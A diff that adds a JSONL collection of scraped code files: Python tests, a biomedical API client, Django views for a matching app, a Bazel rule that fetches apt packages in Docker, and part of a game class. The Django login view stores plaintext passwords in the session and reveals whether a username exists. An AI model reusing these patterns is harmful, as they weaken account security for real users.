diff --git "a/1690.jsonl" "b/1690.jsonl" new file mode 100644--- /dev/null +++ "b/1690.jsonl" @@ -0,0 +1,686 @@ +{"seq_id":"303341273","text":"from egogoger.virusmusic.pages.main_page import MainPage\nfrom egogoger.virusmusic.constants import BACKEND_ERROR\nfrom egogoger.base_test import Test\nfrom .open_reg_form import open_reg_form\nfrom egogoger.utils import set_input\n\n\nclass InvalidNameTest(Test):\n\tCYRILLIC_NAME = 'Вася'\n\tSHORT_NAME = '1'\n\tLONG_NAME = 'a' * 257\n\n\tdef test(self):\n\t\tmain_page = MainPage(self.driver)\n\t\tform = main_page.reg_form\n\t\topen_reg_form(self, main_page, form)\n\t\tform.clear_inputs()\n\n\t\t# Cyrillic name\n\t\tset_input(self.driver, form.NAME, self.CYRILLIC_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.NAME_ERROR, self, None)\n\t\tform.clear_inputs()\n\n\t\t# Short name\n\t\tset_input(self.driver, form.NAME, self.SHORT_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.NAME_ERROR, self, None)\n\t\tform.clear_inputs()\n\n\t\t# BACKEND checks\n\t\t## Long name\n\t\tform.set_correct_values()\n\t\tset_input(self.driver, form.NAME, self.LONG_NAME)\n\t\tform.submit()\n\t\tform.check_error_msg_for(form.BACKEND_ERROR, self, BACKEND_ERROR)\n\t\tform.clear_inputs()\n","sub_path":"egogoger/virusmusic/tests/invalid_name.py","file_name":"invalid_name.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307742365","text":"#!python3\n\"\"\"\n##### Task 2\nCreate a function called largest.\nThe input is a list.\nThe return value is the largest value in the list\n(2 points)\n\"\"\"\n\ndef largest(numbers):\n numbers.sort()\n answer = numbers[-1]\n return answer\n\nx = largest([1,5,3])\nprint(x)\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"143727057","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='spiky',\n\n version='1.0.3',\n\n description='Spike sorting based on Gaussian Mixture Model',\n\n long_description=long_description,\n\n url='https://github.com/rodriguez-facundo/spiky',\n\n author='F. Rodriguez',\n\n author_email='frodriguez4600@gmail.com',\n\n classifiers=[ 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Medical Science Apps.',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='spike sorting',\n\n packages=['spiky'],\n\n install_requires=[ 'numpy',\n 'matplotlib',\n 'progressbar2',\n 'pywavelets',\n 'scipy',\n 'sklearn'\n ],\n\n extras_require={},\n\n package_data={},\n\n data_files=[],\n\n entry_points={},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"225195359","text":"from mhcgnomes import parse, Species, Allele, Haplotype, Gene\nfrom nose.tools import eq_\n\ndef test_parse_BF2_gene():\n result = parse(\"BF2\")\n expected = Gene.get(\"chicken\", \"BF2\")\n assert expected is not None\n eq_(result, expected)\n\ndef test_parse_BF2_15_01():\n result = parse(\"BF2*15:01\")\n chicken = Species.get(\"chicken\")\n expected = Allele.get(chicken, \"BF2\", \"15\", \"01\")\n eq_(result, expected)\n\ndef test_parse_BF2_1501():\n result = parse(\"BF2*1501\")\n expected = Allele.get(Species.get(\"chicken\"), \"BF2\", \"15\", \"01\")\n eq_(result, expected)\n\ndef test_chicken_haplotype_B12():\n result = parse(\"B12\", default_species=\"Gaga\")\n print(result)\n eq_(type(result), Haplotype)\n eq_(result.name, \"B12\")\n assert result.is_chicken\n\n\ndef test_chicken_haplotype_B19_class_II():\n result = parse(\"B19 Class II\")\n eq_(type(result), Haplotype)\n eq_(result.name, \"B19\")\n assert result.is_chicken\n assert result.is_class2\n\ndef test_chicken_haplotype_BF19_class_I():\n result = parse(\"BF19 Class I\")\n eq_(type(result), Haplotype)\n eq_(result.name, \"BF19\")\n assert result.is_chicken\n assert result.is_class1\n\ndef test_chicken_YF1w_7_1():\n result = parse(\"YF1w*7.1\")\n eq_(type(result), Allele)\n eq_(result.name, \"7.1\")\n eq_(result.gene_name, \"YF1\")\n assert result.is_chicken\n assert result.is_class1\n\ndef test_YF1w_in_gene_aliases():\n species = Species.get(\"chicken\")\n gene_names_and_aliases = species.gene_names_and_aliases\n assert \"YF1w\" in gene_names_and_aliases, gene_names_and_aliases\n","sub_path":"test/test_chicken.py","file_name":"test_chicken.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"570410859","text":"#-*-coding:utf8-*-\n#########################################################################\n# Copyright (C) 2018 All rights reserved.\n# \n# FileName:Align_corpus.py\n# Creator: yuliu1finally@gmail.com\n# Time:02/23/2018\n# Description:\n#\n# Updates:\n#\n#########################################################################\n#!/usr/bin/python\nfrom config import max_seq_len,min_seq_len,filling_symbol;\nif __name__==\"__main__\":\n label_copus_file_path=\"dataset/th2.corpus.txt\";\n align_copus_file_path=\"dataset/th2.corpus.align.txt\";\n with open(align_copus_file_path,\"w\") as align_copus_file:\n with open(label_copus_file_path,\"r\") as label_copus_file:\n for line in label_copus_file:\n line = line.strip();\n tag=line[:2];\n line=line[2:];\n uline=line.decode(\"UTF-8\");\n if len(uline)max_seq_len:\n continue;\n line+=filling_symbol*(max_seq_len-len(uline));\n align_copus_file.write(\"%s%s\\n\"%(tag,line));\n","sub_path":"Align_corpus.py","file_name":"Align_corpus.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"193577395","text":"\"\"\"\r\n.. module:: dmis.berex\r\n :platform: Unix, linux, Windows\r\n.. moduleauthor:: Minji Jeon \r\n\r\n=====================================\r\nBiomedical entity network query API\r\n=====================================\r\n\r\n.. note:: Usage: Biomedical entity network query API\r\n\r\n>>> from dmis import berex\r\n>>> \r\n>>> berexQuery = berex.BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n>>> relevantRelations = getRelevantBioRelations(berexQuery)\r\n>>> \r\n>>> print(relevantRelations)\r\n\r\n\r\n\"\"\"\r\n\r\nfrom functools import reduce\r\n\r\nimport json\r\nimport urllib.request\r\n\r\n#berex query object\r\nclass BEReXQuery():\r\n \"\"\"\r\n dmis.BEReXQuery class is basic query object for BEReX API.\r\n \r\n \"\"\"\r\n \r\n berexurl = \"http://berex.korea.ac.kr/api/\"\r\n \r\n #query has a mode\r\n #mode 1 is to get edges about query entities\r\n #mode 7 is to get enriched gene ontology\r\n \r\n def __init__(self, queryObj={\"keywordA\":[], \"keywordB\":[], \"mode\":1}):\r\n \"\"\"BEReXQuery\r\n \r\n :param queryObj: keywordA (list), keywordB (list), mode ([\"subnet\", \"GOTerms\"]) dict return.\r\n \r\n >>> query = BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\", \"BCR\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n \"\"\"\r\n \r\n if queryObj[\"keywordA\"] == None:\r\n queryObj[\"keywordA\"] = [\"\"]\r\n \r\n if len(queryObj[\"keywordA\"]) == 0:\r\n queryObj[\"keywordA\"] = [\"\"]\r\n \r\n if (\"keywordA\" not in queryObj) or (type(queryObj[\"keywordA\"]) is not list) or (\"keywordB\" not in queryObj) or(type(queryObj[\"keywordB\"]) is not list) or (\"mode\" not in queryObj):\r\n print (\"Initialize error: invalid query object, query object should contains 'keywordA (list of string)', 'keywordB (list of string)', 'mode (['subnet', 'GOTerms'])'\")\r\n print (queryObj)\r\n \r\n for keya in queryObj[\"keywordA\"] :\r\n if type(keya) is not str :\r\n print (\"Initialize error: invalid keywordA. keywordA should be either None, empty list or list of string\")\r\n print (queryObj[\"keywordA\"])\r\n \r\n for keyb in queryObj[\"keywordB\"] :\r\n if type(keyb) is not str :\r\n print (\"Initialize error: invalid keywordB. keywordB should be list of string\")\r\n print (queryObj[\"keywordB\"])\r\n \r\n if queryObj[\"mode\"] not in [\"subnet\", \"GOTerms\"] :\r\n print(\"Initialize error: invalid search mode. The search mode should be either 'subnet' or 'GOTerms'\")\r\n \r\n self.keywordA = queryObj[\"keywordA\"]\r\n self.keywordB = queryObj[\"keywordB\"]\r\n self.mode = queryObj[\"mode\"]\r\n \r\n def setKeywordA (self, keywords):\r\n \"\"\"Setting the primary keywords (Keyword A)\r\n \r\n :param keyword: primary keywords, which must be a list of str\r\n \r\n >>> query.setKeywordA([\"cancer\"])\r\n \"\"\"\r\n \r\n for keya in keywords :\r\n if type(keya) is not str :\r\n print (\"Initialize error : invalid keywordA. keywordA should be list of string\")\r\n print (keywords)\r\n return\r\n \r\n if len(keywords) == 0:\r\n keywords = [\"\"]\r\n return\r\n \r\n self.keywordA = keywords\r\n \r\n def getKeywordA (self):\r\n \"\"\"Getting the primary keyword (Keyword A)\r\n \r\n :return: keyword A list\r\n \r\n >>> keywordA = query.getKeywordA()\r\n >>> print (keywordA)\r\n ['chronic myeloid leukemia']\r\n \"\"\"\r\n return self.keywordA\r\n \r\n def addKeywordtoA (self, keyword):\r\n \"\"\"Adding a keyword to the primary keyword list (Keyword A)\r\n \r\n :param keyword: the keyword to be added to the primary keyword list\r\n \r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR']\r\n >>> query.addKeywordtoA(\"EGFR\")\r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR', \"EGFR']\r\n \"\"\"\r\n self.keywordA.append(keyword)\r\n \r\n def removeKeywordfromA(self, keyword):\r\n \"\"\"Removing a keyword from the primary keyword list (Keyword A)\r\n \r\n :param keyword: the keyword to be removed from the primary keyword list\r\n \r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR', 'EGFR']\r\n >>> query.removeKeywordfromA(\"EGFR\")\r\n >>> print (query.getKeywordA())\r\n ['chronic myeloid leukemia', 'BCR']\r\n \"\"\"\r\n self.keywordA.remove(keyword)\r\n \r\n \r\n def setKeywordB (self, keywords):\r\n \"\"\"Setting the secondary keywords (Keyword B)\r\n \r\n :param keywords: the secondary keywords, which must be a list of str\r\n \r\n >>> keywordB = [\"ABL1\", \"imatinib\"]\r\n >>> query.setKeywordB(keywordB)\r\n \"\"\"\r\n for keyb in keywords :\r\n if type(keyb) is not str :\r\n print (\"Initialize error : invalid keywordB. keywordB should be list of string\")\r\n print (keywords)\r\n return\r\n \r\n if type(keywords) is list:\r\n self.keywordB = keywords\r\n else :\r\n print (\"Warning! keywords should be list type : \" + str(keywords))\r\n \r\n def isValid(self):\r\n if type(self.keywordA) is not list:\r\n return False\r\n \r\n for keya in self.keywordA :\r\n if type(keya) is not str :\r\n return False\r\n \r\n for keyb in self.keywordB :\r\n if type(keyb) is not str :\r\n return False\r\n \r\n if len(self.keywordB) == 0:\r\n return False\r\n \r\n #if self.mode != 1 and self.mode != 7:\r\n# return False\r\n\r\n if self.mode not in [\"subnet\", \"GOTerms\"]:\r\n return False\r\n \r\n return True\r\n \r\n def getKeywordB (self):\r\n \"\"\"Getting the secondary keywords (Keyword B)\r\n \r\n :return: list of keyword B string\r\n \r\n >>> keywordB = query.getKeywordB()\r\n >>> print (keywordB)\r\n ['ABL1', 'imatinib']\r\n \"\"\"\r\n return self.keywordB\r\n \r\n def addKeywordtoB (self, keyword):\r\n \"\"\"Adding a keyword to the secondary keyword list (Keyword B)\r\n \r\n :param keyword: the keyword to be added to the secondary keyword list\r\n \r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib']\r\n >>> query.addKeywordtoB(\"EGFR\")\r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib', 'EGFR']\r\n \"\"\"\r\n self.keywordB.append(keyword)\r\n \r\n def removeKeywordfromB(self, keyword):\r\n \"\"\"Removing a keyword from the secondary keyword list (Keyword B)\r\n \r\n :param keyword: the keyword to be removed from the secondary keyword list\r\n \r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib', 'EGFR']\r\n >>> query.removeKeywordfromB(\"EGFR\")\r\n >>> print (query.getKeywordB())\r\n ['ABL1', 'imatinib']\r\n \"\"\"\r\n self.keywordB.remove(keyword)\r\n \r\n def setMode (self, mode):\r\n \"\"\" Setting a searching mode\r\n \r\n :param mode: searching mode. This should be either \"subnet\" or \"GOTerms\"\r\n \r\n >>> query.setMode(\"subnet\")\r\n \"\"\"\r\n self.mode = mode\r\n \r\n def getMode (self):\r\n \"\"\" Getting the searching mode\r\n \r\n :return: the searching mode\r\n \r\n >>> print (query.getMode())\r\n subnet\r\n \"\"\"\r\n return self.mode\r\n \r\n def makeQueryString(self): \r\n \r\n #paramKeywordA = self.keywordA\r\n paramKeywordA = reduce(lambda x, y: x +\"@@\" + y , self.keywordA)\r\n paramKeywordB = reduce(lambda x, y: x +\"@@\" + y , self.keywordB)\r\n queryKeywords = paramKeywordB\r\n \r\n if paramKeywordA != \"\":\r\n queryKeywords = queryKeywords + \"@@\" + paramKeywordA\r\n queryKeywords = queryKeywords.replace(\" \",\"%20\")\r\n \r\n mode = 1\r\n if self.mode == \"subnet\":\r\n mode = 1\r\n elif self.mode == \"GOTerms\" :\r\n mode = 7\r\n \r\n strQuery = self.berexurl +\"server.php?query=\" + queryKeywords +\"&mode=\" + str(mode)\r\n return strQuery\r\n \r\n#get raw data from berex\r\ndef getRelevantBioRelations(berexQuery):\r\n \"\"\" Function for retrieval from BOSS\r\n \r\n :param berexQuery: BEReXQuery\r\n \r\n :return: subnetwork object (mode \"subnet\") or list of enriched GO terms (mode \"GOTerms\")\r\n \r\n * subnetwork object (list): [BIO_EDGE]\r\n - BIO_EDGE: {\"source\":str, \"target\":str, \"dbsource\":str, \"interaction\":str, \"reference\":str}\r\n * list of GO terms (object): {\"biological process\":[str], \"molecular function\":[str], \"cellular component\":[str]}\r\n \r\n >>> berexQuery = BEReXQuery({\"keywordA\":[\"chronic myeloid leukemia\"], \"keywordB\":[\"ABL1\", \"imatinib\"], \"mode\":\"subnet\"})\r\n >>> relevantRelations = getRelevantBioRelations(bossQuery)\r\n \"\"\"\r\n if not (type(berexQuery) is BEReXQuery):\r\n print (\"query is invalid! please check your query object.\")\r\n \r\n if not berexQuery.isValid() :\r\n print (\"Query object is invalid. Please check the query\")\r\n print (\"Query: \")\r\n print (\" keywordA: \" + str(berexQuery.keywordA))\r\n print (\" keywordB: \" + str(berexQuery.keywordB))\r\n print (\" mode: \" + str(berexQuery.mode))\r\n \r\n return {}\r\n \r\n Query = berexQuery.makeQueryString()\r\n \r\n \r\n request = urllib.request.Request(Query)\r\n request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')\r\n \r\n Url = urllib.request.urlopen(request)\r\n \r\n print (Query)\r\n ResultStr = Url.read().decode('utf-8')\r\n \r\n \r\n if berexQuery.getMode() == \"subnet\":\r\n Result = makeDataFromBEReXQueryResult(ResultStr)\r\n elif berexQuery.getMode() == \"GOTerms\":\r\n Result = makeGODataFromBEReXQueryResult(ResultStr)\r\n return Result\r\n\r\n#make data for mode 1 (entity search mode)\r\n#resultDataArr is array containing each edge\r\n#get source node name : resultDataArr[i]['source']\r\n#edge contains source, target, dbsource, interaction,and reference\r\n\r\ndef makeDataFromBEReXQueryResult(resultStr): \r\n if resultStr == \"\":\r\n return None\r\n resultStr = resultStr.replace(\"\",\"\")\r\n resultStr = resultStr.replace(\"
\",\"\")\r\n resultObject = json.loads(resultStr, strict=False)\r\n edges = resultObject['data']['edges']\r\n \r\n linesCnt = len(edges)\r\n resultDataArr = []\r\n curData = {}\r\n for i in range(0, linesCnt) :\r\n edge = edges[i]\r\n \r\n curData={\"source\":edge['source'], \"target\":edge['target'], \"dbsource\":edge['dbsource'], \"interaction\":edge['interaction'],\"reference\":edge['reference']}\r\n resultDataArr.append(curData)\r\n \r\n return resultDataArr\r\n\r\n#make data for mode 7 (go term search mode)\r\n#There are three types of ontology, biological process, molecular function, cellular component\r\n#get biological process: resultData['biological process'] \r\ndef makeGODataFromBEReXQueryResult(resultStr): \r\n if resultStr == \"\":\r\n return None\r\n resultObject = json.loads(resultStr, strict=False)\r\n \r\n bplist = []\r\n mflist = []\r\n cclist = []\r\n \r\n for i in range(0, 3):\r\n if resultObject[i]['mode']==\"bp\":\r\n bplist = resultObject[i]['values']\r\n elif resultObject[i]['mode']==\"mf\":\r\n mflist = resultObject[i]['values']\r\n elif resultObject[i]['mode']==\"cc\":\r\n cclist = resultObject[i]['values']\r\n \r\n resultData = {\"biological process\":bplist, \"molecular function\":mflist, \"cellular component\":cclist}\r\n return resultData","sub_path":"BEST/dmis/berex.py","file_name":"berex.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"258244752","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.template import RequestContext, loader\nfrom matching.models import Member, Profile, Hobby\nfrom django.contrib.auth.hashers import make_password\nfrom django.db import IntegrityError\nfrom datetime import date, datetime\n\n# from mainapp.templatetags.extras import display_message\n\n# datetime library to get time for setting cookie\nimport datetime as D\nimport sys\n\nappname = 'MatchUp'\n# decorator that tests whether user is logged in\ndef loggedin(view):\n def mod_view(request):\n if 'username' in request.session:\n username = request.session['username']\n try: user = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n return view(request, user)\n else:\n return render(request,'matching/not-logged-in.html',{})\n return mod_view\n\n# decorator that tests whether user is logged in for view with multiple arguments\ndef loggedinGET(view):\n def mod_view(request,gender,minage,maxage):\n if 'username' in request.session:\n username = request.session['username']\n try: user = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n return view(request, user,gender,minage,maxage)\n else:\n return render(request,'matching/not-logged-in.html',{})\n return mod_view\n\ndef index(request):\n context = { 'appname': appname }\n return render(request,'matching/index.html',context)\n\ndef signup(request):\n hobbies = Hobby.objects.all()\n context = {\n 'appname': appname,\n 'hobbies': hobbies\n }\n return render(request,'matching/signup.html',context)\n\ndef register(request):\n\n if 'username' in request.POST and 'password' in request.POST and 'email' in request.POST and 'DOB' in request.POST:\n u = request.POST['username']\n e = request.POST['email']\n p = request.POST['password']\n d = request.POST['DOB']\n g = request.POST['gender']\n\n user = Member(username=u)\n user.set_password(p)\n user.email = e\n user.DOB = d\n user.gender = g.lower()\n try: user.save()\n except IntegrityError: raise Http404('Username '+u+' already taken: Usernames must be unique')\n except: raise Http404(\"Date must be in the format YYYY-MM-DD. (e.g. 1997-10-23)\")\n hobbies = Hobby.objects.all()\n for hobby in hobbies:\n if hobby.name in request.POST:\n user.hobbies.add(hobby)\n context = {\n 'appname' : appname,\n 'username' : u\n }\n return render(request,'matching/user-registered.html',context)\n\n else:\n raise Http404('POST data missing')\n\ndef login(request):\n if not ('username' in request.POST and 'password' in request.POST):\n context = { 'appname': appname }\n return render(request,'matching/login.html',context)\n else:\n username = request.POST['username']\n password = request.POST['password']\n try: member = Member.objects.get(username=username)\n except Member.DoesNotExist: raise Http404('User does not exist')\n if member.check_password(password):\n # remember user in session variable\n request.session['username'] = username\n request.session['password'] = password\n context = {\n 'appname': appname,\n 'username': username,\n 'loggedin': True\n }\n response = render(request, 'matching/login.html', context)\n # remember last login in cookie\n now = D.datetime.utcnow()\n max_age = 365 * 24 * 60 * 60 #one year\n delta = now + D.timedelta(seconds=max_age)\n format = \"%a, %d-%b-%Y %H:%M:%S GMT\"\n expires = D.datetime.strftime(delta, format)\n response.set_cookie('last_login',now,expires=expires)\n return response\n else:\n raise Http404('Wrong password')\n\n@loggedin\ndef logout(request, user):\n request.session.flush()\n context = { 'appname': appname }\n return render(request,'matching/logout.html', context)\n\n@loggedin\ndef likes(request,user):\n # list of people user likes\n likes = user.likes.all()\n\n # render reponse\n context = {\n 'appname': appname,\n 'username': user.username,\n 'members': members,\n 'likes': likes,\n 'loggedin': True\n }\n return render(request, 'matching/likes.html', context)\n\n@loggedin\ndef members(request, user):\n try:\n # like someone new\n if 'add' in request.GET:\n like_username = request.GET['add']\n like = Member.objects.get(username=like_username)\n user.likes.add(like)\n user.save()\n like.email_user(\"Somone liked you!\", \"You have been liked by \"+user.get_username())\n # unlike someone\n if 'remove' in request.GET:\n like_username = request.GET['remove']\n like = Member.objects.get(username=like_username)\n user.likes.remove(like)\n user.save()\n except Member.DoesNotExist:\n raise Http404('Member does not exist')\n # view user profile\n if 'view' in request.GET:\n return view_profile(request, request.GET['view'])\n\n else:\n # list of all other members\n members = Member.objects.exclude(username=user.username)\n # list of the user likes\n likes = user.likes.all()\n # render reponse\n context = {\n 'appname': appname,\n 'username': user.username,\n 'members': members,\n 'likes': likes,\n 'loggedin': True\n }\n return render(request, 'matching/members.html', context)\n\n# this function is only ever called from within the members viwe\ndef view_profile(request, view_username):\n username = request.session['username']\n greeting = \"Your\" if username == view_username else view_username + \"'s\"\n try: user = Member.objects.get(username=view_username)\n except Member.DoesNotExist: raise Http404('Member does not exist')\n context = {\n 'user': user,\n 'appname': appname,\n 'username': username,\n 'view_user': view_username,\n 'greeting': greeting,\n 'profile': user.profile,\n 'hobbies': user.hobbies.all(),\n 'loggedin': True\n }\n return render(request, 'matching/member.html', context)\n\n@loggedin\ndef profile(request, user):\n # use this for debugging:\n # import pdb; pdb.set_trace()\n hobbies = Hobby.objects.all()\n userhobbies = user.hobbies.all()\n if request.method =='POST':\n if 'text' in request.POST:\n text = request.POST['text']\n if user.profile:\n user.profile.text = text\n user.profile.save()\n else:\n profile = Profile(text=text)\n profile.save()\n user.profile = profile\n user.save()\n hobbies = Hobby.objects.all()\n userhobbies = user.hobbies.all()\n for hobby in userhobbies:\n user.hobbies.remove(hobby)\n for hobby in hobbies:\n if hobby.name in request.POST:\n user.hobbies.add(hobby)\n user.save()\n context = {\n 'appname': appname,\n 'username': user.username,\n 'profile' : user.profile,\n 'userhobbies' : userhobbies,\n 'hobbies' : hobbies,\n 'loggedin': True\n }\n if request.method == 'POST':\n return HttpResponseRedirect(\"/members/?view=\"+user.username)\n return render(request, 'matching/profile.html', context)\n\n@loggedin\ndef matches(request, user):\n context={\n 'appname': appname,\n 'username': user.username,\n 'loggedin': True\n }\n return render(request, 'matching/matches.html', context)\n\n@loggedinGET\ndef get_matches(request, user, gender, minage, maxage):\n if request.is_ajax():\n matches =[]\n # all other members\n allmembers = Member.objects.exclude(username=user.username)\n # all of the users hobbies\n myhobbies = user.hobbies.all()\n # filter by gender if user has specified\n if gender!=\"any\":\n allmembers = allmembers.filter(gender=gender)\n #filter by minimum age if user has specified\n if minage!=\"-1\":\n current = datetime.now().date()\n min_date = date(current.year - int(minage), current.month, current.day)\n allmembers = allmembers.filter(DOB__lte=min_date)\n #filter by minimum age if user has specified\n if maxage!=\"-1\":\n current = datetime.now().date()\n max_date = date(current.year - int(maxage), current.month, current.day)\n allmembers = allmembers.filter(DOB__gte=max_date)\n\n # for every other member count how many hobbies they have in common and store in a dictionary\n for member in allmembers:\n count = 0\n theirhobbies = member.hobbies.all()\n commonhobbies = []\n for mh in myhobbies:\n for th in theirhobbies:\n if mh == th:\n count+=1\n commonhobbies.append(mh.name)\n temp = {'member': member.username,'commonhobbies': commonhobbies,'age': calculate_age(member.DOB), 'count': count, 'gender':member.gender}\n matches.append(temp)\n #sort other members based on highest number of common hobbies\n matches.sort(key = lambda tup: -tup['count'])\n\n return JsonResponse(matches, safe=False)\n else:\n return HttpResponse(\"err idk\")\n\n# function to calculate a persons age given their date of birth\ndef calculate_age(born):\n today = date.today()\n return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\n@loggedin\ndef upload_image(request, user):\n if 'img_file' in request.FILES:\n image_file = request.FILES['img_file']\n if not user.profile:\n # if user doesn't have a profile yet\n # need to create a profile first\n profile = Profile(text='')\n profile.save()\n user.profile = profile\n user.save()\n user.profile.image = image_file\n user.profile.save()\n return HttpResponse(user.profile.image.url)\n else:\n raise Http404('Image file not received')\n","sub_path":"matching/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"569624171","text":"#Copyright 2017 Google Inc. All rights reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Rule for downloading apt packages and tar them in a .tar file.\"\"\"\n\nload(\"//package_managers/apt_get:repos.bzl\", \"generate_additional_repos\")\nload(\"@io_bazel_rules_docker//docker:docker.bzl\", \"docker_build\")\n\ndef _generate_download_commands(ctx):\n return \"\"\"#!/bin/bash\nset -ex\n# Fetch Index\n# Remove /var/lib/apt/lists/* in the base image. apt-get update -y command will create them.\nrm -rf /var/lib/apt/lists/*\napt-get update -y\n# Make partial dir\nmkdir -p /tmp/install/./partial\n# Install command\napt-get install --no-install-recommends -y -q -o Dir::Cache=\"/tmp/install\" -o Dir::Cache::archives=\".\" {packages} --download-only\n# Tar command to only include all the *.deb files and ignore other directories placed in the cache dir.\ntar -cpf {output}.tar --directory /tmp/install/. `cd /tmp/install/. && ls *.deb`\"\"\".format(\n output=ctx.attr.name,\n packages=' '.join(ctx.attr.packages))\n\ndef _run_download_script(ctx, output, build_contents):\n contents = build_contents.replace(ctx.file.image_tar.short_path, ctx.file.image_tar.path)\n contents = contents.replace(ctx.outputs.pkg_tar.short_path, ctx.outputs.pkg_tar.path)\n # The paths for running within bazel build are different and hence replace short_path\n # by full path\n ctx.actions.write(\n output = ctx.outputs.build_script,\n content = contents,\n )\n\n ctx.actions.run(\n outputs = [ctx.outputs.pkg_tar],\n executable = ctx.outputs.build_script,\n inputs = [ctx.file.image_tar],\n )\n\ndef _impl(ctx):\n # docker_build rules always generate an image named 'bazel/$package:$name'.\n builder_image_name = \"bazel/%s:%s\" % (ctx.attr.image_tar.label.package,\n ctx.attr.image_tar.label.name.split(\".tar\")[0])\n\n # Generate a shell script to run apt_get inside this docker image.\n # TODO(tejaldesai): Replace this by docker_run rule\n build_contents = \"\"\"\\\n#!/bin/bash\nset -ex\ndocker load --input {image_tar}\n# Run the builder image.\ncid=$(docker run -w=\"/\" -d --privileged {image_name} sh -c $'{download_commands}')\ndocker attach $cid\ndocker cp $cid:{installables}.tar {output}\n# Cleanup\ndocker rm $cid\n \"\"\".format(image_tar=ctx.file.image_tar.short_path,\n image_name=builder_image_name,\n installables=ctx.attr.name,\n download_commands=_generate_download_commands(ctx),\n output=ctx.outputs.pkg_tar.short_path,\n )\n _run_download_script(ctx, ctx.outputs.pkg_tar, build_contents)\n ctx.actions.write(\n output = ctx.outputs.executable,\n content = build_contents,\n )\n return struct(\n runfiles = ctx.runfiles(files = [ctx.file.image_tar, ctx.outputs.build_script]),\n files = depset([ctx.outputs.executable])\n )\n\n_download_pkgs = rule(\n attrs = {\n \"image_tar\": attr.label(\n default = Label(\"//ubuntu:ubuntu_16_0_4_vanilla.tar\"),\n allow_files = True,\n single_file = True,\n ),\n \"packages\": attr.string_list(\n mandatory = True,\n ),\n },\n executable = True,\n outputs = {\n \"pkg_tar\": \"%{name}.tar\",\n \"build_script\": \"%{name}.sh\",\n },\n implementation = _impl,\n)\n\n\"\"\"Downloads packages within a container\n\nThis rule creates a script to download packages within a container.\nIt also run the script and produces the tarball if requested.\nThe script bunldes all the packages in a tarball.\n\nArgs:\n name: A unique name for this rule.\n image_tar: The image tar for the container used to download packages.\n packages: list of packages to download. e.g. ['curl', 'netbase']\n\"\"\"\n\ndef download_pkgs(name, image_tar, packages, additional_repos=[]):\n \"\"\"Downloads packages within a container\n This rule creates a script to download packages within a container.\n The script bunldes all the packages in a tarball.\n Args:\n name: A unique name for this rule.\n image_tar: The image tar for the container used to download packages.\n packages: list of packages to download. e.g. ['curl', 'netbase']\n additional_repos: list of additional debian package repos to use, in sources.list format\n \"\"\"\n tars = []\n if additional_repos:\n repo_name=\"{0}_repos\".format(name)\n generate_additional_repos(\n name = repo_name,\n repos = additional_repos\n )\n tars.append(\"%s.tar\" % repo_name)\n\n\n img_target_name = \"{0}_build\".format(name)\n docker_build(\n name = img_target_name,\n base = image_tar,\n tars = tars,\n )\n _download_pkgs(\n name = \"{0}\".format(name),\n image_tar = \":{0}.tar\".format(img_target_name),\n packages = packages,\n )\n","sub_path":"package_managers/download_pkgs.bzl","file_name":"download_pkgs.bzl","file_ext":"bzl","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"10937708","text":"from helpers import *\nfrom player_state import PlayerState\nfrom species import Species\nfrom feeding import *\nfrom traitcard import TraitCard\n\"\"\"\nA Dealer Object.\n\"\"\"\n\n\nclass Dealer(object):\n \"\"\"\n A representation of a game of Evolution containing both the state of the game,\n and 